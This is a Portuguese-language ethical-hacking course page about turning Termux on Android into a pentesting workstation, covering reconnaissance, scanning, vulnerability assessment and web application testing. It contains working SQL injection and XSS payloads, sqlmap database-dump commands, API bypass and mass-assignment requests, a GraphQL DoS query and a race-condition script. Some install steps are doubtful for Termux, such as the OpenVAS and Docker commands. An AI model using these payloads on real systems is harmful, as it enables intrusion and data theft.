Termux Academy

A jornada completa do Junior ao Master em Ethical Hacking

100+ Ferramentas 500+ Comandos 20 Módulos

Trilha de Aprendizado Completa

🚀

Iniciante

Fundamentos, configuração e comandos básicos

Intermediário

Reconhecimento, scanning e exploração

🔥

Avançado

Automation, forensics e técnicas avançadas

O Que é o Termux?

O Termux é muito mais que um simples emulador de terminal para Android. É um ambiente Linux completo que transforma seu smartphone em uma estação de trabalho de cybersecurity portátil e poderosa.

  • Ambiente Linux completo sem necessidade de root
  • Mais de 1000+ pacotes disponíveis via APT
  • Suporte completo para Python, Node.js, Go, Rust, C/C++
  • Integração total com armazenamento do Android
  • Ferramentas profissionais de penetration testing
termux
$ uname -a
Linux localhost 5.4.0 aarch64 Android
$ pkg list-installed | wc -l
1247
$ python --version
Python 3.11.6
$ nmap --version
Nmap version 7.94

⚠️ AVISO CRÍTICO SOBRE USO ÉTICO

Este curso contém conhecimento extremamente poderoso. Com grandes poderes vêm grandes responsabilidades.

IMPORTANTE:
  • NUNCA teste em sistemas que não são seus
  • SEMPRE obtenha autorização por escrito
  • • Use apenas em ambientes controlados (laboratórios, VMs próprias)
  • • O objetivo é defender, não atacar
  • • Violações podem resultar em processo criminal
100+
Ferramentas
500+
Comandos
50+
Técnicas
24/7
Suporte

Quick Start - Primeiros Passos

1. Instalação Correta

Baixe sempre do F-Droid para ter a versão mais atualizada:

📱 F-Droid → Buscar "Termux" → Instalar

2. Primeiro Boot

Atualize o sistema imediatamente:

pkg update && pkg upgrade -y

Configuração Inicial Profissional

Transforme seu Android numa estação de trabalho de cybersecurity

1. Instalação Correta e Segura

CRÍTICO: NUNCA instale do Google Play Store! A versão está desatualizada e tem problemas de segurança.

Método Recomendado - F-Droid

1

Instalar F-Droid

Baixe de: https://f-droid.org

2

Buscar Termux

No F-Droid, procure por "Termux"

3

Instalar Termux

Versão sempre atualizada

4

Add-ons Opcionais

Termux:API, Termux:Widget, Termux:Tasker

Verificação de Integridade

verificação
$ echo $PREFIX
/data/data/com.termux/files/usr
$ pkg list-installed | head -3
apt/stable,now 2.7.2
bash/stable,now 5.2.15-2
coreutils/stable,now 9.3-2

2. Atualização e Otimização do Sistema

Atualização Completa do Sistema

Execute estes comandos na sequência para garantir que tudo esteja atualizado:

# Atualização básica
pkg update && pkg upgrade -y
# Atualização completa com limpeza
pkg update
pkg upgrade -y
pkg autoclean
pkg autoremove
# Script de atualização automática
echo '#!/bin/bash
pkg update -y
pkg upgrade -y
pkg autoclean
echo "Sistema atualizado com sucesso!"
' > $PREFIX/bin/update-system && chmod +x $PREFIX/bin/update-system

3. Configuração de Armazenamento Avançada

Acesso ao Armazenamento

Configure o acesso completo ao sistema de arquivos do Android:

# Configurar acesso ao armazenamento
termux-setup-storage

# Verificar mapeamentos criados
ls -la storage/

Após executar, conceda a permissão de armazenamento quando solicitado pelo Android.

Estrutura de Pastas

estrutura
storage/
├── downloads/ 📁 Downloads
├── dcim/ 📁 Câmera
├── pictures/ 📁 Imagens
├── music/ 📁 Música
├── movies/ 📁 Vídeos
└── shared/ 📁 Armazenamento interno

4. Pacotes Essenciais para CyberSecurity

Ferramentas Básicas

# Essenciais do sistema
pkg install -y git curl wget nano vim openssh

# Linguagens de programação
pkg install -y python nodejs golang rust clang

# Ferramentas de rede
pkg install -y nmap netcat-openbsd iproute2 dnsutils

# Utilitários
pkg install -y htop tree file which

Ferramentas de Hacking

# Repositórios especializados
pkg install -y unstable-repo x11-repo root-repo

# Ferramentas de pentest
pkg install -y hydra sqlmap nikto dirb hashcat

# Análise forense
pkg install -y binwalk exiftool foremost

# Compiladores e depuradores
pkg install -y gdb radare2 objdump

5. Customização Avançada do Terminal

Oh My Zsh + Plugins Profissionais

# Instalar Zsh e Oh My Zsh
pkg install -y zsh
sh -c "$(curl -fsSL https://raw.github.com/ohmyzsh/ohmyzsh/master/tools/install.sh)"

# Plugins essenciais
git clone https://github.com/zsh-users/zsh-autosuggestions ${ZSH_CUSTOM:-~/.oh-my-zsh/custom}/plugins/zsh-autosuggestions
git clone https://github.com/zsh-users/zsh-syntax-highlighting.git ${ZSH_CUSTOM:-~/.oh-my-zsh/custom}/plugins/zsh-syntax-highlighting

# Tema Powerlevel10k
git clone --depth=1 https://github.com/romkatv/powerlevel10k.git ${ZSH_CUSTOM:-$HOME/.oh-my-zsh/custom}/themes/powerlevel10k

Configuração .zshrc Otimizada

# Backup e criar novo .zshrc
cp ~/.zshrc ~/.zshrc.backup

cat > ~/.zshrc << 'EOF'
export ZSH="$HOME/.oh-my-zsh"
ZSH_THEME="powerlevel10k/powerlevel10k"

plugins=(
    git
    zsh-autosuggestions
    zsh-syntax-highlighting
    command-not-found
    colored-man-pages
    extract
    web-search
)

source $ZSH/oh-my-zsh.sh

# Aliases personalizados para hacking
alias ll='ls -alF'
alias la='ls -A'
alias l='ls -CF'
alias ..='cd ..'
alias ...='cd ../..'
alias grep='grep --color=auto'
alias fgrep='fgrep --color=auto'
alias egrep='egrep --color=auto'

# Aliases específicos para pentest
alias nse='nmap --script-help'
alias ports='netstat -tuln'
alias ips='ip addr show'
alias routes='ip route show'

# Funções úteis
extract() {
    if [ -f $1 ] ; then
        case $1 in
            *.tar.bz2)   tar xjf $1     ;;
            *.tar.gz)    tar xzf $1     ;;
            *.bz2)       bunzip2 $1     ;;
            *.rar)       unrar e $1     ;;
            *.gz)        gunzip $1      ;;
            *.tar)       tar xf $1      ;;
            *.tbz2)      tar xjf $1     ;;
            *.tgz)       tar xzf $1     ;;
            *.zip)       unzip $1       ;;
            *.Z)         uncompress $1  ;;
            *.7z)        7z x $1        ;;
            *)     echo "'$1' cannot be extracted via extract()" ;;
        esac
    else
        echo "'$1' is not a valid file"
    fi
}
EOF

# Aplicar configurações
source ~/.zshrc

6. Configurações de Segurança

SSH Server Setup

# Instalar e configurar SSH
pkg install openssh

# Gerar chaves SSH
ssh-keygen -t ed25519 -C "termux@android"

# Configurar sshd
echo "Port 8022
PasswordAuthentication yes
PubkeyAuthentication yes
AuthorizedKeysFile .ssh/authorized_keys" > $PREFIX/etc/ssh/sshd_config

# Definir senha para o usuário
passwd

# Iniciar SSH server
sshd

Backup e Recovery

# Script de backup automático
mkdir -p ~/backups

cat > ~/backups/backup.sh << 'EOF'
#!/bin/bash
DATE=$(date +%Y%m%d_%H%M%S)
BACKUP_DIR="~/backups"
tar -czf "$BACKUP_DIR/termux_backup_$DATE.tar.gz" \
    -C $HOME \
    --exclude="backups" \
    --exclude=".cache" \
    .
echo "Backup criado: termux_backup_$DATE.tar.gz"
EOF

chmod +x ~/backups/backup.sh

Parabéns! Seu Termux agora está configurado profissionalmente. Continue para os módulos de comandos e ferramentas avançadas.

Domínio Completo de Linux

Fundamentos essenciais para hackers éticos profissionais

Terminal Interativo - Pratique Agora

Terminal Interativo Funcional

Terminal Funcional: Este é um terminal real usando xterm.js! Experimente comandos como: ls, pwd, date, whoami, clear, help

Ambiente de Desenvolvimento Avançado

Transforme seu Termux numa workstation completa

Linguagens de Programação

🐍 Python Completo

# Python + pip + ferramentas
pkg install python python-pip
pip install --upgrade pip

# Bibliotecas essenciais para hacking
pip install requests beautifulsoup4 scapy
pip install colorama pyfiglet termcolor
pip install cryptography paramiko

🟢 Node.js + NPM

# Node.js LTS
pkg install nodejs npm

# Ferramentas globais úteis
npm install -g http-server
npm install -g wscat
npm install -g nodemon

🦀 Rust + Cargo

# Rust para ferramentas rápidas
pkg install rust

# Ferramentas úteis em Rust
cargo install ripgrep bat fd-find
cargo install tokei hyperfine

Ferramentas de Desenvolvimento

Editores Avançados

# Vim com plugins
pkg install vim
git clone https://github.com/VundleVim/Vundle.vim.git ~/.vim/bundle/Vundle.vim

# Neovim (mais moderno)
pkg install neovim

# Micro editor (user-friendly)
pkg install micro

# Emacs
pkg install emacs

Git e Controle de Versão

# Git completo
pkg install git

# Configuração global
git config --global user.name "Seu Nome"
git config --global user.email "email@exemplo.com"

# Aliases úteis
git config --global alias.st status
git config --global alias.co checkout
git config --global alias.br branch

Ambientes Virtuais e Containers

Python Virtual Environments

# Criar ambiente virtual
python -m venv projeto-hack

# Ativar ambiente
source projeto-hack/bin/activate

# Instalar dependências
pip install -r requirements.txt

# Desativar ambiente
deactivate

Docker no Termux

# Instalar Docker (experimental)
pkg install docker

# Executar container Kali Linux
docker pull kalilinux/kali-rolling

# Container interativo
docker run -it kalilinux/kali-rolling /bin/bash

Reconhecimento Passivo Profissional

A arte de coletar informações sem ser detectado

Framework OSINT Completo

🌐 Nmap - O Rei dos Scanners

# Instalação
pkg install nmap

# Scan básico
nmap scanme.nmap.org

# Scan stealth
nmap -sS -O scanme.nmap.org

# Vulnerabilidades
nmap --script vuln scanme.nmap.org

# Scan completo
nmap -A -T4 scanme.nmap.org

🔍 Whois e DNS

# Whois completo
pkg install whois
whois google.com

# DNS avançado
pkg install dnsutils
dig google.com ANY
nslookup google.com

# DNS reverso
dig -x 8.8.8.8

🕷️ Web Crawling

# wget recursivo
wget -r -np -k --random-wait https://example.com

# curl com headers
curl -I https://example.com

# Lynx browser text
pkg install lynx
lynx -dump https://example.com

📊 Shodan CLI

# Instalar Shodan
pip install shodan

# Configurar API key
shodan init SUA_API_KEY

# Buscar dispositivos
shodan search "apache"
shodan host 8.8.8.8

🎯 Subdomain Enumeration

# Subfinder
go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
subfinder -d example.com

# Assetfinder
go install github.com/tomnomnom/assetfinder@latest
assetfinder example.com

📱 Social Media OSINT

# Sherlock - username search
git clone https://github.com/sherlock-project/sherlock.git
cd sherlock
pip install -r requirements.txt
python sherlock.py username

Ferramentas OSINT Avançadas

TheHarvester - Email e Subdomain

# Instalar TheHarvester
git clone https://github.com/laramies/theHarvester.git
cd theHarvester
pip install -r requirements.txt

# Buscar emails e subdomains
python theHarvester.py -d example.com -l 100 -b google
python theHarvester.py -d example.com -b all

Recon-ng Framework

# Instalar Recon-ng
git clone https://github.com/lanmaster53/recon-ng.git
cd recon-ng
pip install -r REQUIREMENTS

# Executar
python recon-ng

# Dentro do recon-ng
marketplace search
modules load recon/domains-hosts/hackertarget
info
options set SOURCE example.com
run

Workflow de Reconhecimento Profissional

Script Automatizado de Recon

#!/bin/bash
# Auto Recon Script

TARGET=$1
if [ -z "$TARGET" ]; then
    echo "Uso: $0 "
    exit 1
fi

echo "[+] Iniciando reconhecimento para $TARGET"

# 1. Whois
echo "[+] Coletando WHOIS..."
whois $TARGET > whois_$TARGET.txt

# 2. DNS
echo "[+] Enumeração DNS..."
dig $TARGET ANY > dns_$TARGET.txt

# 3. Subdomains
echo "[+] Buscando subdomínios..."
subfinder -d $TARGET -o subdomains_$TARGET.txt

# 4. Nmap
echo "[+] Port scan..."
nmap -sV -oN nmap_$TARGET.txt $TARGET

echo "[+] Reconhecimento completo!"

Python OSINT Script

#!/usr/bin/env python3
import requests
import socket
import dns.resolver

def osint_target(domain):
    print(f"[+] OSINT para {domain}")
    
    # IP Resolution
    try:
        ip = socket.gethostbyname(domain)
        print(f"[+] IP: {ip}")
    except:
        print("[-] Erro ao resolver IP")
    
    # HTTP Headers
    try:
        r = requests.get(f"http://{domain}")
        print(f"[+] Server: {r.headers.get('Server')}")
        print(f"[+] Status: {r.status_code}")
    except:
        print("[-] Erro HTTP")
    
    # DNS Records
    try:
        mx = dns.resolver.resolve(domain, 'MX')
        print(f"[+] MX Records: {[str(x) for x in mx]}")
    except:
        print("[-] Sem MX records")

if __name__ == "__main__":
    target = input("Digite o domínio: ")
    osint_target(target)

Fase 2: Varredura e Análise de Vulnerabilidades

Nesta fase, interagimos mais ativamente com o alvo para identificar portas abertas, serviços em execução e possíveis vulnerabilidades.

Nmap - Scans Avançados

O Nmap pode fazer muito mais do que apenas descobrir hosts. Ele pode detectar versões de serviços, sistemas operacionais e até mesmo usar scripts para encontrar vulnerabilidades.

Scan de Versão de Serviços (-sV):

nmap -sV scanme.nmap.org

Scan com Scripts Padrão (-sC):

nmap -sC scanme.nmap.org

Scan Agressivo (-A):

nmap -A scanme.nmap.org

Fase 3: Obtenção de Acesso (Exploração)

Após identificar uma vulnerabilidade, esta fase foca em usar um "exploit" para obter acesso não autorizado ao sistema.

Metasploit Framework

O Metasploit é uma das mais poderosas e populares plataformas para desenvolvimento e execução de exploits. Sua instalação no Termux requer alguns passos.

Instalação (pode demorar):

pkg install unstable-repo -y
pkg install metasploit -y

Executando o Metasploit:

Após a instalação, você pode iniciar o console do Metasploit com um único comando.

msfconsole

O uso do Metasploit é um campo de estudo vasto. A partir do console, você pode procurar por exploits (search), selecionar um (use), configurar as opções (set) e executar (exploit).

Fase 4: Defesa e Análise de Tráfego

Entender as ferramentas de ataque também nos ensina como nos defender. Uma das melhores maneiras é analisar o tráfego da sua própria rede.

Tcpdump

Uma poderosa ferramenta de linha de comando para capturar e analisar pacotes de rede. Permite ver em tempo real o que está acontecendo na sua conexão.

Instalação:

pkg install tcpdump

Exemplo de Uso (escutar na interface wlan0):

Este comando precisa ser executado como root, o que não é o padrão no Termux. Para redes locais, seu uso é mais prático em um Linux de desktop.

# tcpdump -i wlan0

OSINT Avançado

Inteligência de Fontes Abertas: Coletando Informações Como um Profissional

Metodologia OSINT Profissional

1. Definir Alvo

Identificar pessoa, empresa ou domínio

2. Mapear Fontes

Redes sociais, sites, registros públicos

3. Coletar Dados

Extrair informações de forma passiva

4. Analisar

Correlacionar e validar informações

🔧 Toolkit OSINT Essencial

🌐 Web Intelligence
  • • Shodan (IoT/Devices)
  • • Censys (Certificates)
  • • Wayback Machine
  • • Google Dorking
  • • TheHarvester
📱 Social Media
  • • Sherlock (Username)
  • • Social Searcher
  • • TinEye (Reverse Image)
  • • Maltego
  • • Spiderfoot
🔍 Domain/IP Intelligence
  • • Whois Lookup
  • • DNS Enumeration
  • • Sublist3r
  • • Amass
  • • DNSRecon

Scripts OSINT Automatizados

🔍 Domain Intelligence Script

# Instalar ferramentas OSINT
pkg update && pkg upgrade -y
pkg install python python-pip git nmap
pip install requests beautifulsoup4

# TheHarvester - Email/Subdomain Collection  
git clone https://github.com/laramies/theHarvester
cd theHarvester
pip install -r requirements.txt

# Uso básico
python3 theHarvester.py -d example.com -b google,bing,yahoo

🌐 Shodan API Integration

#!/usr/bin/env python3
import shodan
import requests

def shodan_search(query, api_key):
    api = shodan.Shodan(api_key)
    try:
        results = api.search(query)
        print(f'[+] {results["total"]} results found')
        
        for result in results['matches']:
            print(f'IP: {result["ip_str"]}')
            print(f'Port: {result["port"]}')
            print(f'Organization: {result.get("org", "N/A")}')
            print('-' * 40)
            
    except shodan.APIError as e:
        print(f'Error: {e}')

# Exemplo de uso
# shodan_search('apache', 'YOUR_API_KEY')

Técnicas OSINT Avançadas

🔍 Google Dorking Avançado

Operadores Essenciais:
site: Busca em domínio específico
filetype: Busca por tipo de arquivo
inurl: Termo deve estar na URL
intitle: Termo deve estar no título
cache: Versão em cache da página
Dorks Práticos:
site:example.com filetype:pdf
inurl:admin site:target.com
"index of" site:example.com
intitle:"webcam 7" inurl:view.shtml

📊 Análise de Metadados

# Instalar ExifTool
pkg install exiftool

# Analisar metadados de imagem
exiftool image.jpg

# Extrair informações GPS
exiftool -gps:all -c "%.6f" image.jpg

# Limpar metadados (sanitizar)
exiftool -all= -overwrite_original image.jpg

🕸️ Web Scraping Ético

#!/usr/bin/env python3
import requests
from bs4 import BeautifulSoup
import time

def scrape_emails(url):
    headers = {'User-Agent': 'Mozilla/5.0 (compatible; OSINT-Bot/1.0)'}
    
    try:
        response = requests.get(url, headers=headers)
        soup = BeautifulSoup(response.content, 'html.parser')
        
        # Encontrar emails
        import re
        email_pattern = r'\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b'
        emails = re.findall(email_pattern, response.text)
        
        return list(set(emails))  # Remove duplicatas
        
    except Exception as e:
        print(f'Erro: {e}')
        return []

# Respeitar robots.txt e rate limits
time.sleep(1)  # 1 segundo entre requests

⚖️ Ética e Legalidade em OSINT

✅ Práticas Éticas:
  • • Usar apenas fontes públicas
  • • Respeitar termos de serviço
  • • Não violar privacidade
  • • Rate limiting em requests
  • • Documentar metodologia
❌ Evitar:
  • • Social engineering ativo
  • • Violação de sistemas
  • • Stalking ou harassment
  • • Uso malicioso de dados
  • • Violação de leis locais

Vulnerability Assessment

Identificação e Análise Sistemática de Vulnerabilidades

Metodologia de Avaliação de Vulnerabilidades

1. Escopo

Definir alvos e limites

2. Discovery

Identificar ativos e serviços

3. Scan

Detectar vulnerabilidades

4. Análise

Classificar e priorizar

5. Report

Documentar achados

🎯 Categorias de Vulnerabilidades (OWASP)

🔴 Críticas
  • • Remote Code Execution (RCE)
  • • SQL Injection
  • • Authentication Bypass
  • • Privilege Escalation
  • • Directory Traversal
🟡 Altas
  • • Cross-Site Scripting (XSS)
  • • CSRF Attacks
  • • Insecure Direct Object References
  • • Security Misconfiguration
  • • Sensitive Data Exposure
🟢 Médias/Baixas
  • • Information Disclosure
  • • Weak Password Policy
  • • Missing Security Headers
  • • Outdated Components
  • • Insufficient Logging

Ferramentas de Vulnerability Assessment

🔍 Nessus - Scanner Profissional

# Instalar Nessus no Termux (simulação)
# Nessus é comercial, mas existe versão home gratuita

# Download do Nessus Home
wget https://www.tenable.com/downloads/nessus

# OpenVAS como alternativa open source
pkg install openvas

# Configurar OpenVAS
openvas-setup
openvas-start

# Acessar via browser: https://localhost:9392

Recursos: 65,000+ plugins, compliance checks, credentialed scanning

⚡ Nuclei - Fast Vulnerability Scanner

# Instalar Nuclei
pkg install golang
go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest

# Atualizar templates
nuclei -update-templates

# Scan básico
nuclei -u https://target.com

# Scan com severidade específica
nuclei -u https://target.com -severity critical,high

# Scan com templates específicos
nuclei -u https://target.com -t cves/ -t vulnerabilities/

Vantagens: Rápido, templates atualizados, integração CI/CD

🐉 Nikto - Web Vulnerability Scanner

# Instalar Nikto
pkg install nikto

# Scan básico
nikto -h https://target.com

# Scan com plugins específicos
nikto -h target.com -Plugins outdated,headers

# Scan com output em XML
nikto -h target.com -Format xml -output results.xml

# Scan evasivo (slower but stealthier)
nikto -h target.com -evasion 1234567

Especialidade: Web servers, 6,700+ vulnerability tests

🔐 Lynis - System Hardening Scanner

# Instalar Lynis
pkg install lynis

# Auditoria completa do sistema
lynis audit system

# Auditoria específica (networking)
lynis audit system --tests-category networking

# Gerar relatório detalhado
lynis audit system --report-file /tmp/lynis-report.dat

# Verificar hardening score
lynis show report

Foco: System hardening, compliance, configuration security

Análise Avançada de Vulnerabilidades

📊 Sistema de Scoring CVSS 3.1

Base Score (0-10):
  • 9.0-10.0 - Critical
  • 7.0-8.9 - High
  • 4.0-6.9 - Medium
  • 0.1-3.9 - Low
Métricas Base:
  • • Attack Vector (AV)
  • • Attack Complexity (AC)
  • • Privileges Required (PR)
  • • User Interaction (UI)
  • • Scope (S)
Impacto:
  • • Confidentiality (C)
  • • Integrity (I)
  • • Availability (A)

🎯 Priorização de Vulnerabilidades

#!/usr/bin/env python3
"""
Sistema de Priorização de Vulnerabilidades
Combina CVSS Score + Exploitabilidade + Contexto de Negócio
"""

def calculate_priority(cvss_score, exploitability, business_impact, asset_value):
    # Normalizar valores (0-1)
    cvss_norm = cvss_score / 10.0
    exploit_norm = exploitability / 10.0  # 1-10 scale
    business_norm = business_impact / 5.0  # 1-5 scale
    asset_norm = asset_value / 5.0        # 1-5 scale
    
    # Pesos (ajustar conforme necessário)
    weight_cvss = 0.3
    weight_exploit = 0.25
    weight_business = 0.25
    weight_asset = 0.2
    
    priority_score = (
        cvss_norm * weight_cvss +
        exploit_norm * weight_exploit +
        business_norm * weight_business +
        asset_norm * weight_asset
    ) * 10
    
    if priority_score >= 8.5:
        return "CRITICAL - Remediate immediately"
    elif priority_score >= 7.0:
        return "HIGH - Remediate within 24-48h"
    elif priority_score >= 5.0:
        return "MEDIUM - Remediate within 1 week"
    else:
        return "LOW - Remediate within 30 days"

# Exemplo de uso
vuln_priority = calculate_priority(
    cvss_score=9.8,      # CVSS Score
    exploitability=8,    # Facilidade de exploração
    business_impact=4,   # Impacto no negócio
    asset_value=5        # Valor do ativo
)

print(f"Prioridade: {vuln_priority}")

Gestão Automatizada de Vulnerabilidades

🔄 Pipeline CI/CD Security

# .github/workflows/security-scan.yml
name: Security Vulnerability Scan

on:
  push:
    branches: [main, develop]
  pull_request:
    branches: [main]

jobs:
  security-scan:
    runs-on: ubuntu-latest
    
    steps:
    - uses: actions/checkout@v2
    
    - name: Run Nuclei Scan
      uses: projectdiscovery/nuclei-action@main
      with:
        target: 'https://staging.example.com'
        templates: 'cves,vulnerabilities'
        
    - name: Run OWASP ZAP Baseline
      uses: zaproxy/action-baseline@v0.4.0
      with:
        target: 'https://staging.example.com'
        
    - name: Upload Results
      uses: actions/upload-artifact@v2
      with:
        name: security-reports
        path: reports/

📈 Vulnerability Metrics Dashboard

# Script para métricas de vulnerabilidades
#!/bin/bash

# Configurar variáveis
REPORT_DIR="/tmp/vuln-reports"
DATE=$(date +%Y%m%d)

echo "=== Vulnerability Assessment Report ==="
echo "Date: $(date)"
echo "========================================"

# Contadores por severidade
CRITICAL=$(grep -c "CRITICAL" $REPORT_DIR/*.xml 2>/dev/null || echo 0)
HIGH=$(grep -c "HIGH" $REPORT_DIR/*.xml 2>/dev/null || echo 0)
MEDIUM=$(grep -c "MEDIUM" $REPORT_DIR/*.xml 2>/dev/null || echo 0)
LOW=$(grep -c "LOW" $REPORT_DIR/*.xml 2>/dev/null || echo 0)

echo "Critical: $CRITICAL"
echo "High: $HIGH"  
echo "Medium: $MEDIUM"
echo "Low: $LOW"
echo "Total: $((CRITICAL + HIGH + MEDIUM + LOW))"

# Gerar gráfico ASCII simples
echo ""
echo "Risk Distribution:"
echo "Critical: $(printf '%*s' $CRITICAL | tr ' ' '█')"
echo "High:     $(printf '%*s' $HIGH | tr ' ' '█')"
echo "Medium:   $(printf '%*s' $MEDIUM | tr ' ' '█')"
echo "Low:      $(printf '%*s' $LOW | tr ' ' '█')"

🛡️ Melhores Práticas em Vulnerability Assessment

✅ Processo:
  • • Scans regulares e automatizados
  • • Correlação entre diferentes ferramentas
  • • Validação manual de falsos positivos
  • • Priorização baseada em risco
  • • Tracking de remediation
  • • Métricas e KPIs definidos
⚠️ Cuidados:
  • • Não confiar apenas em scanners automatizados
  • • Considerar impacto no negócio antes de corrigir
  • • Testar patches em ambiente de desenvolvimento
  • • Manter inventário atualizado de ativos
  • • Comunicar riscos para stakeholders
  • • Documentar exceções e compensatory controls

Web Application Testing

Testes Avançados de Segurança em Aplicações Web

OWASP Top 10 - 2021 Edition

A01

Broken Access Control

Controle de acesso falho

A02

Cryptographic Failures

Falhas criptográficas

A03

Injection

Injeção de código

A04

Insecure Design

Design inseguro

A05

Security Misconfiguration

Configuração insegura

A06

Vulnerable Components

Componentes vulneráveis

A07

Authentication Failures

Falhas de autenticação

A08

Software Integrity Failures

Falhas de integridade

A09

Logging Failures

Falhas de logging

A10

SSRF

Server-Side Request Forgery

Ferramentas de Web Application Testing

🕷️ OWASP ZAP - Web App Scanner

# Instalar OWASP ZAP
pkg install openjdk-17
wget https://github.com/zaproxy/zaproxy/releases/download/v2.12.0/ZAP_2.12.0_Linux.tar.gz
tar -xzf ZAP_2.12.0_Linux.tar.gz

# Scan básico (headless)
./zap.sh -cmd -quickurl https://target.com -quickout report.html

# Scan com spider + active scan
./zap.sh -cmd -quickurl https://target.com -quickprogress -quickout report.xml

# Scan com autenticação
./zap.sh -cmd -configfile session.config -quickurl https://target.com

# API scan
./zap.sh -cmd -openapiurl https://target.com/api/swagger.json

🔥 Burp Suite Community

# Instalar Burp Suite Community
pkg install openjdk-17
wget https://portswigger.net/burp/releases/download?product=community

# Configurar proxy (127.0.0.1:8080)
# No navegador: Configurar proxy para localhost:8080

# Configurar certificado SSL
# 1. Acessar http://burp no navegador
# 2. Download CA Certificate
# 3. Instalar certificado no sistema

# Comandos úteis do Burp:
# Ctrl+I - Enviar para Intruder
# Ctrl+R - Enviar para Repeater  
# Ctrl+Shift+B - Enviar para Scanner (Pro only)

⚡ SQLmap - SQL Injection Tool

# Instalar SQLmap
pkg install python
git clone https://github.com/sqlmapproject/sqlmap
cd sqlmap

# Teste básico de SQL Injection
python sqlmap.py -u "http://target.com/page.php?id=1"

# Com cookies de sessão
python sqlmap.py -u "http://target.com/page.php?id=1" --cookie="PHPSESSID=abc123"

# Dump de database específica
python sqlmap.py -u "http://target.com/page.php?id=1" --dbs

# Dump de tabelas específicas
python sqlmap.py -u "http://target.com/page.php?id=1" -D database_name --tables

# Dump de dados específicos
python sqlmap.py -u "http://target.com/page.php?id=1" -D db_name -T table_name --dump

🔍 Gobuster - Directory/File Bruteforcer

# Instalar Gobuster
pkg install golang
go install github.com/OJ/gobuster/v3@latest

# Directory bruteforcing
gobuster dir -u https://target.com -w /path/to/wordlist.txt

# Com extensões específicas
gobuster dir -u https://target.com -w wordlist.txt -x php,html,js,txt

# DNS subdomain enumeration
gobuster dns -d target.com -w subdomains.txt

# Virtual host discovery
gobuster vhost -u https://target.com -w vhosts.txt

# API endpoint discovery
gobuster dir -u https://api.target.com -w api-wordlist.txt -p pattern

Técnicas de Teste Manual

💉 Testes de Injection

SQL Injection Payloads:
# Basic payloads
' OR '1'='1
' OR '1'='1' --
' OR '1'='1' /*
1' UNION SELECT null,null,null--
1' AND (SELECT SUBSTRING(@@version,1,1))='5'--

# Time-based blind
1' AND (SELECT SLEEP(5))--
1' AND (SELECT * FROM (SELECT SLEEP(5))a)--

# Boolean-based blind  
1' AND ASCII(SUBSTRING((SELECT user()),1,1))=114--
XSS Payloads:
# Basic XSS
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>

# Bypass filters
<ScRiPt>alert('XSS')</ScRiPt>
<script>eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))</script>

# DOM-based XSS
#<script>alert('XSS')</script>

🔐 Authentication & Authorization Testing

Checklist Básico:
  • • Username enumeration
  • • Weak password policy
  • • Brute force protection
  • • Session management
  • • Privilege escalation
Bypass Técnicas:
  • • Parameter pollution
  • • HTTP method bypass
  • • Path traversal
  • • IDOR attacks
  • • JWT manipulation
Session Testing:
  • • Cookie security flags
  • • Session fixation
  • • Session timeout
  • • Concurrent sessions
  • • Logout functionality

🌐 Business Logic Testing

#!/usr/bin/env python3
"""
Business Logic Testing Scenarios
Testes específicos para lógica de negócio
"""

# Cenários comuns de teste:

# 1. Race Conditions
# - Multiple simultaneous requests
# - Timing attacks on critical operations

# 2. Workflow Bypass  
# - Skip steps in multi-step processes
# - Access restricted functions directly

# 3. Price Manipulation
# - Negative quantities
# - Currency manipulation
# - Discount abuse

# 4. Data Validation Bypass
# - Unexpected data types
# - Boundary value testing
# - Input length restrictions

# Exemplo: Teste de race condition
import threading
import requests

def concurrent_request():
    response = requests.post('https://target.com/api/withdraw', 
                           json={'amount': 1000},
                           headers={'Authorization': 'Bearer token123'})
    print(f"Status: {response.status_code}")

# Executar 10 requests simultâneos
threads = []
for i in range(10):
    t = threading.Thread(target=concurrent_request)
    threads.append(t)
    t.start()

for t in threads:
    t.join()

API Security Testing

🔌 REST API Testing

# Usando curl para testes de API

# 1. Enumeração de endpoints
curl -X GET https://api.target.com/v1/
curl -X OPTIONS https://api.target.com/v1/users

# 2. Authentication bypass
curl -X GET https://api.target.com/v1/admin/users
curl -X GET https://api.target.com/v1/users/1 -H "X-Original-URL: /admin"

# 3. HTTP Method tampering  
curl -X DELETE https://api.target.com/v1/users/1
curl -X PUT https://api.target.com/v1/users/1 -d '{"role":"admin"}'

# 4. Parameter pollution
curl "https://api.target.com/v1/user?id=1&id=2"

# 5. Mass Assignment
curl -X POST https://api.target.com/v1/users \
  -H "Content-Type: application/json" \
  -d '{"username":"test","role":"admin","is_active":true}'

📊 GraphQL Testing

# GraphQL Introspection
curl -X POST https://api.target.com/graphql \
  -H "Content-Type: application/json" \
  -d '{"query":"query IntrospectionQuery {__schema {queryType {name}}}"}'

# Schema discovery
curl -X POST https://api.target.com/graphql \
  -H "Content-Type: application/json" \
  -d '{"query":"{__schema{types{name,fields{name,type{name}}}}}"}'

# Depth-based attack (DoS)
curl -X POST https://api.target.com/graphql \
  -H "Content-Type: application/json" \
  -d '{"query":"query{user{posts{comments{author{posts{comments{author{name}}}}}}}}"}'

# Batch attack  
curl -X POST https://api.target.com/graphql \
  -H "Content-Type: application/json" \
  -d '[{"query":"query{user(id:1){name}}"},{"query":"query{user(id:2){name}}"}]'

📋 Relatório de Web Application Testing

🎯 Elementos Essenciais:
  • • Executive Summary com risk overview
  • • Metodologia e ferramentas utilizadas
  • • Vulnerabilidades por categoria OWASP
  • • Screenshots e evidências técnicas
  • • Proof of Concept (PoC) quando aplicável
  • • Impacto de negócio de cada achado
  • • Recomendações específicas de correção
  • • Timeline para remediation
⚠️ Considerações Importantes:
  • • Testar apenas aplicações autorizadas
  • • Não causar downtime ou perda de dados
  • • Documentar todos os testes realizados
  • • Manter confidencialidade dos achados
  • • Seguir responsible disclosure
  • • Validar correções após implementação
  • • Considerar falsos positivos
  • • Priorizar by business risk

Payload Generation

Criação e Customização de Payloads para Testes de Penetração

⚠️ AVISO CRÍTICO DE SEGURANÇA

Payloads são ferramentas de TESTE AUTORIZADO! Este conteúdo é estritamente para pentesting ético e educação em ambientes controlados.

Usar contra sistemas não autorizados é CRIME FEDERAL com penas de até 10 anos de prisão. Use apenas em labs próprios ou com autorização escrita.

Tipos e Categorias de Payloads

Reverse Shells

Conexão de volta para o atacante

Bind Shells

Porta aberta no alvo

Web Shells

Interface web para controle

Memory Injection

